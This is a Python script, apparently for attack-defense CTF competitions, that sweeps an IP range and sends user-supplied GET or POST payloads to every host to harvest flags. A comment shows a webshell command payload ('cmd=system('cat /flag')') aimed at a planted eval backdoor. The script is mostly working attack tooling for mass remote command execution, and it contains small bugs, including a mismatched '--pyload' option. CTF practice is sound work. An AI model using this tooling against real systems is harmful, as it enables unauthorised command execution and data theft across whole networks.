批量get_flag v3

#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests
import sys


# 批量Get_Flag

# IP地址處理,調用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一個數組
def IPs(ip):
    IPS = []
    s1 = "/"
    s2 = "-"
    if ip.find(s1) > 0:
        ip1 = IP(ip)
        for i in ip1:
            IPS.append(i)
    elif (str(ip).find(s2)) > 0:
        for i in range(int(str(ip)[str(ip).rfind('.') + 1:str(ip).rfind('-')]),
                       int(str(ip)[str(ip).rfind('-') + 1:]) + 1):
            IPS.append(str(ip)[:str(ip).rfind('.') + 1] + str(i))
    return IPS


headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': 'https://www.baidu.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 ',
    'Cache-Control': 'no-cache'
}


# get請求
def get_Requests(ip, payload):
    url = 'http://' + str(ip) + '/' + payload
    try:
        get_Flag = requests.get(url, headers=headers, timeout=3)
        return get_Flag.text
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"


# post請求
def post_Requests(ip, payload, post_data):
    url = 'http://' + ip + '/' + payload
    temp1 = post_data.split('&')
    dist = {}
    for i in temp1:
        dist[i.split('=')[0]] = i.split('=')[1]
    print(dist)
    try:
        get_Flag = requests.post(url,
                                 headers=headers,
                                 data=dist,
                                 timeout=3)
        return get_Flag.text
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"


# 讀取文件
def open_file(file_name):
    data = []
    for line in open(file_name):
        test = line.strip('\n')
        data.append(test)
    return data


# 解析get數據包
def get_Data(data):
    paload = data[0].split(' ')[1]
    return paload


# pass=365Eval@Awd&cmd=system('cat /flag')
# 解析post數據包
def post_Data(data):
    paload = data[0].split(' ')[1]
    post = []
    post.append(paload)
    post_data = data[len(data) - 1]
    post.append(post_data)
    return post


def cmd():
    request_type = ''
    payload = ''
    post_data = ''
    filename = ''
    ip = ''
    if len(sys.argv) == 1:
        print("Instructions for use")
        print("python3 Game.py --type=get --ip=192.168.10.0/24 --pyload=test.php")
        print("python3 Game.py --type=post --ip=192.168.10.0/24 --pyload=test.php --data=username=sss&passwd=ddd")
        print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ")
        main()
    else:
        for i in sys.argv:
            if i.split('=')[0] == '--type':
                request_type = str(i.split('=')[1])
            elif i.split('=')[0] == '--payload':
                payload = str(i.split('=')[1])
            elif i.split('=')[0] == '--data':
                post_data = str(i.split('=')[1])
            elif i.split('=')[0] == '--file':
                filename = str(i.split('=')[1])
            elif i.split('=')[0] == '--ip':
                ip = i.split('=')[1]
        if len(request_type) != 0:
            if request_type.upper() == 'GET':
                for i in IPs(ip):
                    print('[*]testing ' + i)
                    print(get_Requests(i, payload))
            elif request_type.upper() == 'POST':
                for i in IPs(ip):
                    print('[*]testing ' + i)
                    print(post_Requests(i, post_Data(post_data)[0], post_Data(post_data)[1]))
            else:
                data = open_file(filename)
                if data[0].split(' ')[0] == 'GET':
                    for i in IPs(ip):
                        print('[*]testing ' + i)
                        print(get_Requests(i, get_Data(data)))
                elif data[0].split(' ')[0] == 'POST':
                    for i in IPs(ip):
                        print('[*]testing ' + i)
                        print(post_Requests(i, post_Data(data)[0], post_Data(data)[1]))
                else:
                    print('error')


def main():
    print('#get_Flag V2.0')
    ip = input('Please enter the IP range >>>')

    num = int(input('Please select request method 1 = get 2 = post 3 = auto>>>'))
    if num != 3:
        payload = input('Please enter the payload>>>')
        if num == 2:
            post_data = input('Please enter post_data>>>')
            for i in IPs(ip):
                print('[*]testing ' + i)
                print(post_Requests(i, payload, post_data))
        else:
            for i in IPs(ip):
                print('[*]testing ' + i)
                print(get_Requests(i, payload))
    else:
        filename = input('Please enter filename>>>')
        data = open_file(filename)
        if data[0].split(' ')[0] == 'GET':
            for i in IPs(ip):
                print('[*]testing ' + i)
                print(get_Requests(i, get_Data(data)))
        elif data[0].split(' ')[0] == 'POST':
            for i in IPs(ip):
                print('[*]testing ' + i)
                print(post_Requests(i, post_Data(data)[0], post_Data(data)[1]))
        else:
            print('error')


if __name__ == '__main__':
    cmd()
相關文章
相關標籤/搜索